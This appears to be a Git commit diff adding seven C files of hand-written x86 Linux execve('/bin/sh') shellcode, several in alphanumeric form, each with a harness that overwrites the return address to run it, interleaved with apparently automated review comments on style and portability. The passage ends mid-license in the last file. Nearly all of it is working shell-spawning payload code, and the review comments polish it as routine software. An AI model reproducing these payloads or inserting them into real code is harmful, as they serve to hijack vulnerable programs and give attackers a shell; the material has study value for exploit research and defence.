
First commit

0 parents commit b8e66c3d4a596f45992c339ed7580865a4bcf430 @buffer committed May 14, 2011
Showing with 706 additions and 0 deletions.
  1. +42 −0 buffer-i386-alpha.c
  2. +58 −0 buffer-i386-cool.c
  3. +53 −0 buffer-i386-crazy.c
  4. +257 −0 buffer-i386-delirium.c
  5. +182 −0 buffer-i386-raptus.c
  6. +58 −0 buffer-i386-reallycool.c
  7. +56 −0 buffer-i386-short.c
42 buffer-i386-alpha.c
@@ -0,0 +1,42 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+char shellcode[] = "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0T"
+ "odjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Do"
+ "w0towjhXfRhnKshhBabivERSvT29";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
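Review bot: `ret = (long *)&ret + 2;` followed by `(*ret) = (long)shellcode;` on lines 54–55 writes through a pointer derived from the address of a local, which is undefined behaviour and only reaches the saved return address for one particular compiler frame layout; the identical construct is repeated in buffer-i386-cool.c, buffer-i386-crazy.c, buffer-i386-delirium.c, buffer-i386-raptus.c, buffer-i386-reallycool.c and buffer-i386-short.c. `main()` on line 51 also relies on implicit int, which C99 removed, so the file will not compile as standard C. Because the outcome depends entirely on the toolchain, the header should state that this is a test harness with a fixed-frame-layout assumption, e.g. `/* Test harness: assumes the 2002-era gcc frame layout (saved return address two slots above ret); undefined behaviour and unreliable on any other toolchain. */`, and the definition should read `int main(void) {`.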
58 buffer-i386-cool.c
@@ -0,0 +1,58 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTR@CT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 31 d2 xor %edx,%edx
+ * 80483c5: 52 push %edx
+ * 80483c6: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cb: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d0: 89 e3 mov %esp,%ebx
+ * 80483d2: 52 push %edx
+ * 80483d3: 53 push %ebx
+ * 80483d4: 89 e1 mov %esp,%ecx
+ * 80483d6: 6a 0b push $0xb
+ * 80483d8: 51 push %ecx
+ * 80483d9: 52 push %edx
+ * 80483da: 53 push %ebx
+ * 80483db: 83 ec 10 sub $0x10,%esp
+ * 80483de: 61 popa
+ * 80483df: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+ "\x52\x53\x89\xe1\x6a\x0b\x51\x52\x53\x83\xec\x10\x61\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
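Review bot: The license text on line 84 reads `CONTR@CT` where every other copy of the disclaimer in this commit reads `CONTRACT`; since this is meant to be the verbatim BSD wording, the line should be `* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT`. The instruction listing on lines 90–104 is the right way to document a byte string like the one on lines 108–109 — it is what lets a reviewer check the array against its stated intent — so it is worth keeping in sync whenever the bytes change.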
53 buffer-i386-crazy.c
@@ -0,0 +1,53 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68"
+ "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
+ "THREE.RULES.TO.CODE.COOL.SHELLCODES"
+ "\x44\x44\x83\xc4\x20\x40\x40\x80\xeb\x03\x66"
+ "\x83\xc7\x05\x66\x83\xed\x06\x51"
+ "IF.LIFE.IS.SHORT.YOUR.SHELLCODE.SHOULD.BE.SHORTER"
+ "\x44\x44\x83\xc4\x30\x59\x04\x04\x4b\x4a\x4e"
+ "\x4e\x66\x83\xc7\x05\x66\x83\xed\x05\x51"
+ "NEVER.THINK.ABOUT.YOUR.MOMMY.WHILE.CODING"
+ "\x83\xc4\x18\x59\x40\x40\x4a\x66\x83\xc6\x03"
+ "\x66\x83\xc7\x03\x55"
+ "DONT.TOUCH.REGISTERS.TITS.ARE.BETTER"
+ "\x4c\x83\xc4\x3c\x40\x4b\x41\x4a\x46\x47\x66"
+ "\x83\xed\x05\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
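Review bot: Unlike buffer-i386-cool.c and buffer-i386-short.c, this file gives no instruction listing for the byte string on lines 151–164, and the ASCII phrases spliced between the hex escapes are not explained, so a reader cannot verify what the array encodes without taking it apart by hand. A header comment in the style of the sibling files, listing each instruction beside its bytes and stating that the embedded text is deliberate, would make the array reviewable rather than opaque. The file header on line 122 otherwise describes it only as `execve ("/bin/sh"..)`, which does not distinguish it from the other six variants.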
257 buffer-i386-delirium.c
@@ -0,0 +1,257 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2003 Angelo Dell'Aera <buffer@antifork.org>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+
+/*
+ * This is an alphanumeric code completely written by hand which builds a
+ * shellcode and then executes it. It can be considered as the evolution
+ * of buffer-i386-raptus.c. Infact, in that shellcode, just the last asm
+ * instruction (int $0x80) is built at run-time. Here anything is built
+ * at run-time! Just a nice delirium, isn't it?! 8)
+ * This code was developed using Fenris by Michael Zalewski which helped
+ * me too much during development. As you can see from comments below,
+ * this shellcode works fine if __GNUC__ < 3. This is due to optimizations
+ * introduced by gcc with __GNUC__ 3. At this moment it's not available
+ * a version for such compilers but probably it will happen in the next
+ * future. Have fun!
+ */
+
+#include <ansidecl.h>
+
+main()
+{
+
+
+#if GCC_VERSION < 3000
+
+
+long *ret;
+char shellcode[] = "h3Zo0" // 68 33 5a 6f 30 push $0x306f5a33
+ "X" // 58 pop %eax
+ "5YQ7O" // 35 59 51 37 4f xor $0x4f375159,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "Y" // 59 pop %ecx
+ "hfXZn" // 68 66 58 5a 6e push $0x6e565866
+ "X" // 58 pop %eax
+ "5404A" // 35 34 30 34 41 xor $0x41343034,%eax
+ "P" // 50 push %eax
+ "Z" // 5a pop %edx
+ "hGXXn" // 68 47 58 58 6e push $0x6e585847
+ "X" // 58 pop %eax
+ "5400A" // 35 34 30 30 41 xor $0x41303034,%eax
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "hn000" // 68 6e 30 30 30 push $0x3030306e
+ "X" // 58 pop %eax
+ "5ARYO" // 35 41 52 59 4f xor $0x4f595241,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "P" // 50 push %eax
+ "Z" // 5a pop %edx
+ "hffff" // 68 66 66 66 66 push $66666666
+ "X" // 58 pop %eax
+ "54545" // 35 34 35 34 35 xor $0x35343534,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Q" // 51 push %ecx
+ "J" // 4a dec %edx
+ "J" // 4a dec %edx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "R" // 52 push %edx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax
+ "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "H" // 48 dec %eax
+ ;
+
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+#else
+# error "This shellcode doesn't work if compiled with gcc-3.x. "
+# error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...."
+#endif
+
+}
+
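Review bot: The guard on line 227 tests `GCC_VERSION`, a macro supplied by `<ansidecl.h>` (line 221), which is a libiberty/binutils header rather than a standard one, so on a system without it the build fails at the include before the guard is ever evaluated; the comment on lines 215–218 already states the real condition in terms of `__GNUC__`. Testing the compiler's own macro removes the dependency and the include: `#if __GNUC__ < 3`. The same header and guard appear in buffer-i386-raptus.c (lines 480 and 485). The two consecutive `#error` directives on lines 427–428 also produce two separate diagnostics; a single `#error "This shellcode only works with gcc < 3 (__GNUC__ < 3); aborting."` reads better. Note that `shellcode` here (line 231) is a stack local, whereas every other file in the commit makes it a global — that difference is what makes this variant sensitive to the compiler's optimisations and deserves a one-line comment.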
182 buffer-i386-raptus.c
@@ -0,0 +1,182 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2003 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+
+/*
+ * This is an alphanumeric shellcode completely written by hand. It was
+ * developed using Fenris by Michael Zalewski which helped me too much
+ * during development. As you can see from comments below, this shellcode
+ * works fine if __GNUC__ < 3. This is due to optimizations introduced by
+ * gcc with __GNUC__ 3. At this moment it's not available a version for
+ * such compilers but probably it will happen in the next future.
+ *
+ * Thanks :
+ * ALoR - he suggested to me the idea of 'pushing the unobtainable' 8)
+ *
+ */
+
+
+#include <ansidecl.h>
+
+main()
+{
+
+#if GCC_VERSION < 3000
+
+long *ret;
+char shellcode[] = "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax
+ "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "hZZZZ" // 68 5a 5a 5a 5a push $0x5a5a5a5a
+ "X" // 58 pop %eax
+ "5ZZZZ" // 35 5a 5a 5a 5a xor $0x5a5a5a5a,%eax
+ "P" // 50 push %eax
+ "hn0sh" // 68 6e 30 73 68 push $0x6873306e
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "h00bi" // 68 30 30 62 69 push $0x69623030
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "T" // 54 push %esp
+ "Z" // 5a pop %edx
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "T" // 54 push %esp
+ "Y" // 59 pop %ecx
+ "hXPPP" // 68 58 50 50 50 push $0x50505058
+ "X" // 58 pop %eax
+ "5SPPP" // 35 53 50 50 50 xor $0x50505053,%eax
+ "P" // 50 push %eax
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "Q" // 51 push %ecx
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "U" // 55 push %ebp
+ "T" // 54 push %esp
+ "V" // 56 push %esi
+ "W" // 57 push %edi
+ "a"; // 61 popa
+
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+#else
+# error "This shellcode doesn't work if compiled with gcc-3.x. "
+# error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...."
+#endif
+
+}
+
58 buffer-i386-reallycool.c
@@ -0,0 +1,58 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 6a 0b push $0xb
+ * 80483c5: 58 pop %eax
+ * 80483c6: 99 cltd
+ * 80483c7: 52 push %edx
+ * 80483c8: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cd: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d2: 89 e3 mov %esp,%ebx
+ * 80483d4: 50 push %eax
+ * 80483d5: 8d 4c 24 f4 lea 0xfffffff4(%esp,1),%ecx
+ * 80483d9: 51 push %ecx
+ * 80483da: 52 push %edx
+ * 80483db: 53 push %ebx
+ * 80483dc: 83 ec 10 sub $0x10,%esp
+ * 80483df: 61 popa
+ * 80483e0: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+ "\x50\x8d\x4c\x24\xf4\x51\x52\x53\x83\xec\x10\x61\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
56 buffer-i386-short.c
@@ -0,0 +1,56 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ * Alberto Ornaghi <alor@blackhats.it>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
